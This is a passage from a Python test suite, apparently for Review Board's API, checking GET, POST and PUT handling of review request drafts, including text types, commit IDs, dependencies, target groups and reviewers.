expected_text=r'\#<\`This\` is a \*\*test\*\*>',
custom_field_supports_markdown=False)
def test_get_with_plain_and_force_plain_and_custom_nomarkdown(self):
"""Testing the GET review-requests/<id>/draft/ API with plain text,
?force-text-type=raw,markdown, and custom field that does not support
markdown
"""
self._test_get_with_custom_and_force(
source_text='#<`This` is a **test**>',
rich_text=False,
force_text_type='plain',
expected_text='#<`This` is a **test**>',
custom_field_supports_markdown=False)
def test_get_with_plain_and_force_html_and_custom_nomarkdown(self):
"""Testing the GET review-requests/<id>/draft/ API with plain text,
?force-text-type=raw,markdown, and custom field that does not support
markdown
"""
self._test_get_with_custom_and_force(
source_text='#<`This` is a **test**>',
rich_text=False,
force_text_type='html',
expected_text='#<`This` is a **test**>',
custom_field_supports_markdown=False)
#
# HTTP POST tests
#
def setup_basic_post_test(self, user, with_local_site, local_site_name,
post_valid_data):
review_request = self.create_review_request(
with_local_site=with_local_site,
submitter=user,
publish=True)
return (get_review_request_draft_url(review_request, local_site_name),
review_request_draft_item_mimetype,
{'description': 'New description'},
[review_request])
def check_post_result(self, user, rsp, review_request):
draft = review_request.get_draft()
self.assertIsNotNone(draft)
self.assertFalse(draft.rich_text)
self.compare_item(rsp['draft'], draft)
def test_post_with_publish_and_custom_field(self):
"""Testing the POST review-requests/<id>/draft/ API with custom
field set in same request and public=1
"""
class CustomField(BaseReviewRequestField):
can_record_change_entry = True
field_id = 'my-test'
fieldset = get_review_request_fieldset('info')
fieldset.add_field(CustomField)
try:
review_request = self.create_review_request(
submitter=self.user, publish=True, target_people=[self.user])
rsp = self.api_post(
get_review_request_draft_url(review_request),
{
'extra_data.my-test': 123,
'public': True
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
review_request = ReviewRequest.objects.get(pk=review_request.id)
self.assertIn('my-test', review_request.extra_data)
self.assertEqual(review_request.extra_data['my-test'], 123)
self.assertTrue(review_request.public)
finally:
fieldset.remove_field(CustomField)
def test_post_with_publish_and_custom_field_and_unbound_extra_data(self):
"""Testing the POST review-requests/<id>/draft/ API with custom
text field and extra_data unbound to a field set in same request and
public=1
"""
class CustomField(BaseTextAreaField):
field_id = 'my-test'
fieldset = get_review_request_fieldset('info')
fieldset.add_field(CustomField)
try:
review_request = self.create_review_request(
submitter=self.user, publish=True, target_people=[self.user])
rsp = self.api_post(
get_review_request_draft_url(review_request),
{
'extra_data.my-test': 'foo',
'extra_data.my-test_text_type': 'markdown',
'extra_data.unbound': 42,
'public': True
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
# Confirm all the extra_data fields appear in the draft response.
draft_rsp = rsp['draft']
draft_extra_data = draft_rsp['extra_data']
self.assertIn('my-test', draft_extra_data)
self.assertEqual(draft_extra_data['my-test'], 'foo')
self.assertIn('unbound', draft_extra_data)
self.assertEqual(draft_extra_data['unbound'], 42)
self.assertIn('my-test_text_type', draft_extra_data)
self.assertEqual(draft_extra_data['my-test_text_type'], 'markdown')
# Further confirm only extra_data contents bound to a field were
# promoted to the review request upon publishing.
review_request = ReviewRequest.objects.get(pk=review_request.id)
self.assertIn('my-test', review_request.extra_data)
self.assertEqual(review_request.extra_data['my-test'], 'foo')
self.assertNotIn('unbound', review_request.extra_data)
self.assertIn('my-test_text_type', review_request.extra_data)
self.assertEqual(review_request.extra_data['my-test_text_type'],
'markdown')
self.assertTrue(review_request.public)
finally:
fieldset.remove_field(CustomField)
def test_post_with_publish_with_first_draft_as_other_user(self):
"""Testing the POST review-requests/<id>/draft/ API with first draft
as other user (with can_edit_reviewrequest after submit-as)
"""
user = User.objects.get(username='doc')
self.assertNotEqual(self.user, user)
self.user.user_permissions.add(
Permission.objects.get(codename='can_edit_reviewrequest'))
review_request = self.create_review_request(submitter=user,
target_people=[user])
self.spy_on(review_request_publishing.send)
self.spy_on(review_request_published.send)
rsp = self.api_post(
get_review_request_draft_url(review_request),
{
'public': True,
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
review_request = ReviewRequest.objects.get(pk=review_request.id)
self.assertTrue(review_request.public)
self.assertTrue(review_request_publishing.send.called_with(
sender=ReviewRequest,
user=user))
self.assertTrue(review_request_published.send.called_with(
sender=ReviewRequest,
user=user))
def test_post_with_publish_with_publish_as_owner(self):
"""Testing the POST review-requests/<id>/draft/ API with
publish_as_owner=
"""
user = User.objects.get(username='doc')
self.assertNotEqual(self.user, user)
self.user.user_permissions.add(
Permission.objects.get(codename='can_edit_reviewrequest'))
review_request = self.create_review_request(submitter=user,
publish=True,
target_people=[user])
self.spy_on(review_request_publishing.send)
self.spy_on(review_request_published.send)
rsp = self.api_post(
get_review_request_draft_url(review_request),
{
'summary': 'New summary',
'public': True,
'publish_as_owner': True,
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
review_request = ReviewRequest.objects.get(pk=review_request.id)
self.assertEqual(review_request.summary, 'New summary')
self.assertTrue(review_request.public)
self.assertTrue(review_request_publishing.send.called_with(
sender=ReviewRequest,
user=user))
self.assertTrue(review_request_published.send.called_with(
sender=ReviewRequest,
user=user))
#
# HTTP PUT tests
#
def setup_basic_put_test(self, user, with_local_site, local_site_name,
put_valid_data):
review_request = self.create_review_request(
with_local_site=with_local_site,
submitter=user,
publish=True)
draft = ReviewRequestDraft.create(review_request)
return (get_review_request_draft_url(review_request, local_site_name),
review_request_draft_item_mimetype,
{'description': 'New description'},
draft,
[review_request])
def check_put_result(self, user, item_rsp, draft, review_request):
draft = ReviewRequestDraft.create(review_request)
self.compare_item(item_rsp, draft)
def test_put_with_no_changes(self):
"""Testing the PUT review-requests/<id>/draft/ API
with no changes made to the fields
"""
review_request = self.create_review_request(submitter=self.user,
publish=True)
ReviewRequestDraft.create(review_request)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{'public': True},
expected_status=NOTHING_TO_PUBLISH.http_status)
self.assertEqual(rsp['stat'], 'fail')
self.assertEqual(rsp['err']['code'], NOTHING_TO_PUBLISH.code)
self.assertFalse(ChangeDescription.save.called)
self.assertFalse(ReviewRequestDraft.save.called)
def test_put_with_text_type_markdown(self):
"""Testing the PUT review-requests/<id>/draft/ API
with legacy text_type=markdown
"""
self._test_put_with_text_types(
text_type_field='text_type',
text_type_value='markdown',
expected_change_text_type='markdown',
expected_description_text_type='markdown',
expected_testing_done_text_type='markdown',
expected_custom_field_text_type='markdown',
expected_changedesc_update_fields=['rich_text'],
expected_draft_update_fields=['description_rich_text',
'testing_done_rich_text'])
def test_put_with_text_type_plain(self):
"""Testing the PUT review-requests/<id>/draft/ API
with legacy text_type=plain
"""
self._test_put_with_text_types(
text_type_field='text_type',
text_type_value='plain',
expected_change_text_type='plain',
expected_description_text_type='plain',
expected_testing_done_text_type='plain',
expected_custom_field_text_type='plain',
expected_changedesc_update_fields=['rich_text'],
expected_draft_update_fields=['description_rich_text',
'testing_done_rich_text'])
def test_put_with_changedescription_text_type_markdown(self):
"""Testing the PUT review-requests/<id>/draft/ API
with changedescription_text_type=markdown
"""
self._test_put_with_text_types(
text_type_field='changedescription_text_type',
text_type_value='markdown',
expected_change_text_type='markdown',
expected_description_text_type='plain',
expected_testing_done_text_type='plain',
expected_custom_field_text_type='markdown',
expected_changedesc_update_fields=['rich_text'])
def test_put_with_changedescription_text_type_plain(self):
"""Testing the PUT review-requests/<id>/draft/ API
with changedescription_text_type=plain
"""
self._test_put_with_text_types(
text_type_field='changedescription_text_type',
text_type_value='plain',
expected_change_text_type='plain',
expected_description_text_type='plain',
expected_testing_done_text_type='plain',
expected_custom_field_text_type='markdown',
expected_changedesc_update_fields=['rich_text'])
def test_put_with_description_text_type_markdown(self):
"""Testing the PUT review-requests/<id>/draft/ API
with description_text_type=markdown
"""
self._test_put_with_text_types(
text_type_field='description_text_type',
text_type_value='markdown',
expected_change_text_type='plain',
expected_description_text_type='markdown',
expected_testing_done_text_type='plain',
expected_custom_field_text_type='markdown',
expected_draft_update_fields=['description_rich_text'])
def test_put_with_description_text_type_plain(self):
"""Testing the PUT review-requests/<id>/draft/ API
with description_text_type=plain
"""
self._test_put_with_text_types(
text_type_field='description_text_type',
text_type_value='plain',
expected_change_text_type='plain',
expected_description_text_type='plain',
expected_testing_done_text_type='plain',
expected_custom_field_text_type='markdown',
expected_draft_update_fields=['description_rich_text'])
def test_put_with_testing_done_text_type_markdown(self):
"""Testing the PUT review-requests/<id>/draft/ API
with testing_done_text_type=markdown
"""
self._test_put_with_text_types(
text_type_field='testing_done_text_type',
text_type_value='markdown',
expected_change_text_type='plain',
expected_description_text_type='plain',
expected_testing_done_text_type='markdown',
expected_custom_field_text_type='markdown',
expected_draft_update_fields=['testing_done_rich_text'])
def test_put_with_testing_done_text_type_plain(self):
"""Testing the PUT review-requests/<id>/draft/ API
with testing_done_text_type=plain
"""
self._test_put_with_text_types(
text_type_field='testing_done_text_type',
text_type_value='plain',
expected_change_text_type='plain',
expected_description_text_type='plain',
expected_testing_done_text_type='plain',
expected_custom_field_text_type='markdown',
expected_draft_update_fields=['testing_done_rich_text'])
def test_put_with_custom_field_text_type_markdown(self):
"""Testing the PUT review-requests/<id>/draft/ API
with extra_data.*_text_type=markdown
"""
self._test_put_with_text_types(
text_type_field='extra_data.mytext_text_type',
text_type_value='markdown',
expected_change_text_type='plain',
expected_description_text_type='plain',
expected_testing_done_text_type='plain',
expected_custom_field_text_type='markdown')
def test_put_with_custom_field_text_type_plain(self):
"""Testing the PUT review-requests/<id>/draft/ API
with extra_data.*_text_type=plain
"""
self._test_put_with_text_types(
text_type_field='extra_data.mytext_text_type',
text_type_value='plain',
expected_change_text_type='plain',
expected_description_text_type='plain',
expected_testing_done_text_type='plain',
expected_custom_field_text_type='plain')
@webapi_test_template
def test_put_with_branch(self):
"""Testing the PUT <URL> API with branch field"""
review_request = self.create_review_request(submitter=self.user,
publish=True)
ReviewRequestDraft.create(review_request)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'branch': 'new branch',
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(rsp['draft']['branch'], 'new branch')
draft = ReviewRequestDraft.objects.get(pk=rsp['draft']['id'])
self.assertEqual(draft.branch, 'new branch')
self.assertFalse(ChangeDescription.save.called)
self.assertTrue(ReviewRequestDraft.save.last_called_with(
update_fields=['branch', 'last_updated']))
@webapi_test_template
def test_put_with_bugs_closed(self):
"""Testing the PUT <URL> API with bugs_closed field"""
review_request = self.create_review_request(submitter=self.user,
publish=True)
ReviewRequestDraft.create(review_request)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'bugs_closed': '10,20, 300,,',
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(rsp['draft']['bugs_closed'], ['10', '20', '300'])
draft = ReviewRequestDraft.objects.get(pk=rsp['draft']['id'])
self.assertEqual(draft.get_bug_list(), ['10', '20', '300'])
self.assertFalse(ChangeDescription.save.called)
self.assertTrue(ReviewRequestDraft.save.last_called_with(
update_fields=['bugs_closed', 'last_updated']))
@webapi_test_template
def test_put_with_changedescription(self):
"""Testing the PUT <URL> with a change description"""
review_request = self.create_review_request(submitter=self.user,
publish=True)
ReviewRequestDraft.create(review_request)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
changedesc = 'This is a test change description.'
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'changedescription': changedesc,
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(rsp['draft']['changedescription'], changedesc)
draft = ReviewRequestDraft.objects.get(pk=rsp['draft']['id'])
self.assertIsNotNone(draft.changedesc)
self.assertEqual(draft.changedesc.text, changedesc)
self.assertTrue(ChangeDescription.save.last_called_with(
update_fields=['text']))
self.assertFalse(ReviewRequestDraft.save.called)
def test_put_with_commit_id(self):
"""Testing the PUT review-requests/<id>/draft/ API with commit_id"""
review_request = self.create_review_request(submitter=self.user,
publish=True)
ReviewRequestDraft.create(review_request)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
commit_id = 'abc123'
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'commit_id': commit_id,
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(rsp['draft']['commit_id'], commit_id)
self.assertEqual(rsp['draft']['summary'], review_request.summary)
self.assertEqual(rsp['draft']['description'],
review_request.description)
review_request = ReviewRequest.objects.get(pk=review_request.pk)
self.assertNotEqual(review_request.commit_id, commit_id)
self.assertFalse(ChangeDescription.save.called)
self.assertTrue(ReviewRequestDraft.save.last_called_with(
update_fields=['commit_id', 'last_updated']))
def test_put_with_commit_id_and_used_in_review_request(self):
"""Testing the PUT review-requests/<id>/draft/ API with commit_id
used in another review request
"""
commit_id = 'abc123'
self.create_review_request(submitter=self.user,
commit_id=commit_id,
publish=True)
review_request = self.create_review_request(submitter=self.user,
publish=True)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'commit_id': commit_id,
},
expected_status=409)
self.assertEqual(rsp['stat'], 'fail')
self.assertEqual(rsp['err']['code'], COMMIT_ID_ALREADY_EXISTS.code)
review_request = ReviewRequest.objects.get(pk=review_request.pk)
self.assertIsNone(review_request.commit_id)
self.assertFalse(ChangeDescription.save.called)
self.assertFalse(ReviewRequestDraft.save.called)
def test_put_with_commit_id_and_used_in_draft(self):
"""Testing the PUT review-requests/<id>/draft/ API with commit_id
used in another review request draft
"""
commit_id = 'abc123'
existing_review_request = self.create_review_request(
submitter=self.user,
publish=True)
existing_draft = ReviewRequestDraft.create(existing_review_request)
existing_draft.commit_id = commit_id
existing_draft.save(update_fields=('commit_id',))
review_request = self.create_review_request(submitter=self.user,
publish=True)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'commit_id': commit_id,
},
expected_status=409)
self.assertEqual(rsp['stat'], 'fail')
self.assertEqual(rsp['err']['code'], COMMIT_ID_ALREADY_EXISTS.code)
review_request = ReviewRequest.objects.get(pk=review_request.pk)
self.assertIsNone(review_request.commit_id)
self.assertFalse(ChangeDescription.save.called)
self.assertFalse(ReviewRequestDraft.save.called)
def test_put_with_commit_id_empty_string(self):
"""Testing the PUT review-requests/<id>/draft/ API with commit_id=''"""
review_request = self.create_review_request(submitter=self.user,
publish=True)
ReviewRequestDraft.create(review_request)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'commit_id': '',
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertIsNone(rsp['draft']['commit_id'])
review_request = ReviewRequest.objects.get(pk=review_request.pk)
self.assertIsNone(review_request.commit_id)
self.assertFalse(ChangeDescription.save.called)
self.assertFalse(ReviewRequestDraft.save.called)
@add_fixtures(['test_scmtools'])
def test_put_with_commit_id_with_update_from_commit_id(self):
"""Testing the PUT review-requests/<id>/draft/ API with
commit_id and update_from_commit_id=1
"""
repository = self.create_repository(tool_name='Test')
review_request = self.create_review_request(submitter=self.user,
repository=repository,
publish=True)
ReviewRequestDraft.create(review_request)
commit_id = 'abc123'
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'commit_id': commit_id,
'update_from_commit_id': True,
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(rsp['draft']['commit_id'], commit_id)
self.assertEqual(rsp['draft']['summary'], 'Commit summary')
self.assertEqual(rsp['draft']['description'], 'Commit description.')
review_request = ReviewRequest.objects.get(pk=review_request.pk)
self.assertNotEqual(review_request.commit_id, commit_id)
self.assertNotEqual(review_request.description, 'Commit description.')
self.assertNotEqual(review_request.summary, 'Commit summary')
draft = review_request.get_draft()
self.assertEqual(draft.commit_id, commit_id)
self.assertEqual(draft.description, 'Commit description.')
self.assertEqual(draft.summary, 'Commit summary')
self.assertFalse(ChangeDescription.save.called)
self.assertTrue(ReviewRequestDraft.save.last_called_with(
update_fields=['commit_id', 'description', 'description_rich_text',
'diffset', 'last_updated', 'summary']))
def test_put_with_depends_on(self):
"""Testing the PUT review-requests/<id>/draft/ API
with depends_on field
"""
review_request = self.create_review_request(submitter=self.user,
publish=True)
ReviewRequestDraft.create(review_request)
depends_1 = self.create_review_request(
summary='Dependency 1',
publish=True)
depends_2 = self.create_review_request(
summary='Dependency 2',
publish=True)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'depends_on': '%s, %s,,' % (depends_1.pk, depends_2.pk),
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
depends_on = rsp['draft']['depends_on']
self.assertEqual(len(depends_on), 2)
depends_on.sort(key=lambda x: x['title'])
self.assertEqual(depends_on[0]['title'], depends_1.summary)
self.assertEqual(depends_on[1]['title'], depends_2.summary)
draft = ReviewRequestDraft.objects.get(pk=rsp['draft']['id'])
self.assertEqual(list(draft.depends_on.order_by('pk')),
[depends_1, depends_2])
self.assertEqual(list(depends_1.draft_blocks.all()), [draft])
self.assertEqual(list(depends_2.draft_blocks.all()), [draft])
self.assertFalse(ChangeDescription.save.called)
self.assertTrue(ReviewRequestDraft.save.last_called_with(
update_fields=['last_updated']))
@add_fixtures(['test_site'])
def test_put_with_depends_on_and_site(self):
"""Testing the PUT review-requests/<id>/draft/ API
with depends_on field and local site
"""
review_request = self.create_review_request(submitter='doc',
with_local_site=True)
ReviewRequestDraft.create(review_request)
self._login_user(local_site=True)
depends_1 = self.create_review_request(
with_local_site=True,
submitter=self.user,
summary='Test review request',
local_id=3,
publish=True)
# This isn't the review request we want to match.
bad_depends = self.create_review_request(id=3, publish=True)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request, self.local_site_name),
{'depends_on': '3'},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
depends_on = rsp['draft']['depends_on']
self.assertEqual(len(depends_on), 1)
self.assertNotEqual(rsp['draft']['depends_on'][0]['title'],
bad_depends.summary)
self.assertEqual(rsp['draft']['depends_on'][0]['title'],
depends_1.summary)
draft = ReviewRequestDraft.objects.get(pk=rsp['draft']['id'])
self.assertEqual(list(draft.depends_on.all()), [depends_1])
self.assertEqual(list(depends_1.draft_blocks.all()), [draft])
self.assertEqual(bad_depends.draft_blocks.count(), 0)
self.assertFalse(ChangeDescription.save.called)
self.assertTrue(ReviewRequestDraft.save.last_called_with(
update_fields=['last_updated']))
def test_put_with_depends_on_invalid_id(self):
"""Testing the PUT review-requests/<id>/draft/ API
with depends_on field and invalid ID
"""
review_request = self.create_review_request(submitter=self.user,
publish=True)
ReviewRequestDraft.create(review_request)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'depends_on': '10000,https://blah/,/r/123/,BUG-123',
},
expected_status=400)
self.assertEqual(rsp['stat'], 'fail')
self.assertEqual(rsp['err']['code'], INVALID_FORM_DATA.code)
self.assertEqual(rsp['draft']['depends_on'], [])
self.assertEqual(rsp['fields'], {
'depends_on': ['10000', 'https://blah/', '/r/123/', 'BUG-123'],
})
draft = review_request.get_draft()
self.assertEqual(draft.depends_on.count(), 0)
self.assertFalse(ChangeDescription.save.called)
self.assertFalse(ReviewRequestDraft.save.called)
@webapi_test_template
def test_put_with_depends_on_and_emptying_list(self):
"""Testing the PUT <URL> API with depends_on emptying an existing
list
"""
dep1 = self.create_review_request(submitter=self.user,
summary='Dep 1',
publish=True)
dep2 = self.create_review_request(submitter=self.user,
summary='Dep 2',
publish=True)
self.create_review_request(submitter=self.user,
summary='Dep 3',
publish=True)
review_request = self.create_review_request(submitter=self.user)
draft = ReviewRequestDraft.create(review_request)
draft.depends_on.add(dep1, dep2)
rsp = self.api_put(
get_review_request_draft_url(review_request, None),
{
'depends_on': ''
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(rsp['draft']['depends_on'], [])
draft = ReviewRequestDraft.objects.get(pk=draft.pk)
self.assertEqual(draft.depends_on.count(), 0)
@webapi_test_template
def test_put_with_summary(self):
"""Testing the PUT <URL> API with summary field"""
review_request = self.create_review_request(submitter=self.user,
publish=True)
ReviewRequestDraft.create(review_request)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'summary': 'New summary',
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(rsp['draft']['summary'], 'New summary')
draft = ReviewRequestDraft.objects.get(pk=rsp['draft']['id'])
self.assertEqual(draft.summary, 'New summary')
self.assertFalse(ChangeDescription.save.called)
self.assertTrue(ReviewRequestDraft.save.last_called_with(
update_fields=['last_updated', 'summary']))
@webapi_test_template
def test_put_with_summary_with_newline(self):
"""Testing the PUT <URL> API with summary field containing newline"""
review_request = self.create_review_request(submitter=self.user,
publish=True)
ReviewRequestDraft.create(review_request)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'summary': 'New summary\nbah',
},
expected_status=400)
self.assertEqual(rsp['stat'], 'fail')
self.assertEqual(rsp['err']['code'], INVALID_FORM_DATA.code)
self.assertEqual(rsp['draft']['target_groups'], [])
        self.assertEqual(rsp['fields'], {
            'summary': ["The summary can't contain a newline"],
        })
draft = ReviewRequestDraft.objects.get(pk=rsp['draft']['id'])
self.assertEqual(draft.summary, 'Test Summary')
self.assertFalse(ChangeDescription.save.called)
self.assertFalse(ReviewRequestDraft.save.called)
@webapi_test_template
def test_put_with_target_groups(self):
"""Testing the PUT <URL> API with target_groups field"""
group1 = self.create_review_group(name='group1')
group2 = self.create_review_group(name='group2')
review_request = self.create_review_request(submitter=self.user,
publish=True)
ReviewRequestDraft.create(review_request)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'target_groups': 'group1,group2',
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(
rsp['draft']['target_groups'],
[
{
'href': 'http://testserver/api/groups/group1/',
'method': 'GET',
'title': 'group1',
},
{
'href': 'http://testserver/api/groups/group2/',
'method': 'GET',
'title': 'group2',
},
])
draft = ReviewRequestDraft.objects.get(pk=rsp['draft']['id'])
self.assertEqual(list(draft.target_groups.all()),
[group1, group2])
self.assertFalse(ChangeDescription.save.called)
self.assertTrue(ReviewRequestDraft.save.last_called_with(
update_fields=['last_updated']))
@add_fixtures(['test_site'])
@webapi_test_template
def test_put_with_target_groups_with_local_site(self):
"""Testing the PUT <URL> API with target_groups field and Local Site
draft
"""
self.user = self._login_user(local_site=True)
review_request = self.create_review_request(submitter=self.user,
with_local_site=True,
publish=True)
ReviewRequestDraft.create(review_request)
local_site = review_request.local_site
group1 = self.create_review_group(name='group1',
local_site=local_site)
group2 = self.create_review_group(name='group2',
local_site=local_site)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request, local_site),
{
'target_groups': 'group1,group2',
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(
rsp['draft']['target_groups'],
[
{
'href': 'http://testserver/s/local-site-1/'
'api/groups/group1/',
'method': 'GET',
'title': 'group1',
},
{
'href': 'http://testserver/s/local-site-1/'
'api/groups/group2/',
'method': 'GET',
'title': 'group2',
},
])
draft = ReviewRequestDraft.objects.get(pk=rsp['draft']['id'])
self.assertEqual(list(draft.target_groups.all()),
[group1, group2])
self.assertFalse(ChangeDescription.save.called)
self.assertTrue(ReviewRequestDraft.save.last_called_with(
update_fields=['last_updated']))
@add_fixtures(['test_site'])
@webapi_test_template
def test_put_with_target_groups_with_local_site_and_global_group(self):
"""Testing the PUT <URL> API with target_groups field and Local Site
draft with global group
"""
self.user = self._login_user(local_site=True)
review_request = self.create_review_request(submitter=self.user,
with_local_site=True,
publish=True)
ReviewRequestDraft.create(review_request)
local_site = review_request.local_site
self.create_review_group(name='group1', local_site=local_site)
self.create_review_group(name='group2')
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request, local_site),
{
'target_groups': 'group1,group2',
},
expected_status=400)
self.assertEqual(rsp['stat'], 'fail')
self.assertEqual(rsp['err']['code'], INVALID_FORM_DATA.code)
self.assertEqual(rsp['draft']['target_groups'], [])
        self.assertEqual(rsp['fields'], {
            'target_groups': ['group2'],
        })
draft = ReviewRequestDraft.objects.get(pk=rsp['draft']['id'])
self.assertFalse(draft.target_groups.exists())
self.assertFalse(ChangeDescription.save.called)
self.assertFalse(ReviewRequestDraft.save.called)
@webapi_test_template
def test_put_with_target_groups_and_emptying_list(self):
"""Testing the PUT <URL> API with target_groups emptying an existing
list
"""
group1 = self.create_review_group(name='group1')
group2 = self.create_review_group(name='group2')
self.create_review_group(name='group3')
review_request = self.create_review_request(submitter=self.user)
draft = ReviewRequestDraft.create(review_request)
draft.target_groups.add(group1, group2)
rsp = self.api_put(
get_review_request_draft_url(review_request, None),
{
'target_groups': ''
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(rsp['draft']['target_groups'], [])
draft = ReviewRequestDraft.objects.get(pk=draft.pk)
self.assertEqual(draft.target_groups.count(), 0)
@webapi_test_template
def test_put_with_target_people_and_emptying_list(self):
"""Testing the PUT <URL> API with target_people emptying an existing
list
"""
reviewer = User.objects.create(username='reviewer')
review_request = self.create_review_request(submitter=self.user)
draft = ReviewRequestDraft.create(review_request)
draft.target_people.add(reviewer)
rsp = self.api_put(
get_review_request_draft_url(review_request, None),
{
'target_people': ''
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(rsp['draft']['target_people'], [])
draft = ReviewRequestDraft.objects.get(pk=draft.pk)
self.assertEqual(draft.target_people.count(), 0)
@webapi_test_template
def test_put_with_target_people_and_invalid_user(self):
"""Testing the PUT <URL> API with target_people containing invalid
username
"""
review_request = self.create_review_request(submitter=self.user)
draft = ReviewRequestDraft.create(review_request)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request, None),
{
'target_people': 'invalid'
},
expected_status=INVALID_FORM_DATA.http_status)
self.assertEqual(rsp['stat'], 'fail')
self.assertEqual(rsp['err']['code'], INVALID_FORM_DATA.code)
self.assertEqual(rsp['fields'], {
'target_people': ['invalid'],
})
self.assertEqual(rsp['draft']['target_people'], [])
draft = ReviewRequestDraft.objects.get(pk=draft.pk)
self.assertFalse(draft.target_people.exists())
self.assertFalse(ChangeDescription.save.called)
self.assertFalse(ReviewRequestDraft.save.called)
@webapi_test_template
def test_put_with_target_people_and_auth_backend_lookup(self):
"""Testing the PUT <URL> API with target_people and unknown user
lookup in auth backend
"""
def _get_or_create_user(*args, **kwargs):
return User.objects.create(username='backend-user')
review_request = self.create_review_request(submitter=self.user)
draft = ReviewRequestDraft.create(review_request)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
self.spy_on(StandardAuthBackend.get_or_create_user,
owner=StandardAuthBackend,
call_fake=_get_or_create_user)
rsp = self.api_put(
get_review_request_draft_url(review_request, None),
{
'target_people': 'backend-user',
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(rsp['draft']['target_people'], [
{
'href': 'http://testserver/api/users/backend-user/',
'method': 'GET',
'title': 'backend-user',
},
])
self.assertTrue(StandardAuthBackend.get_or_create_user.called_with(
username='backend-user'))
draft = ReviewRequestDraft.objects.get(pk=draft.pk)
self.assertEqual(draft.target_people.count(), 1)
self.assertEqual(draft.target_people.get().username, 'backend-user')
self.assertFalse(ChangeDescription.save.called)
self.assertTrue(ReviewRequestDraft.save.last_called_with(
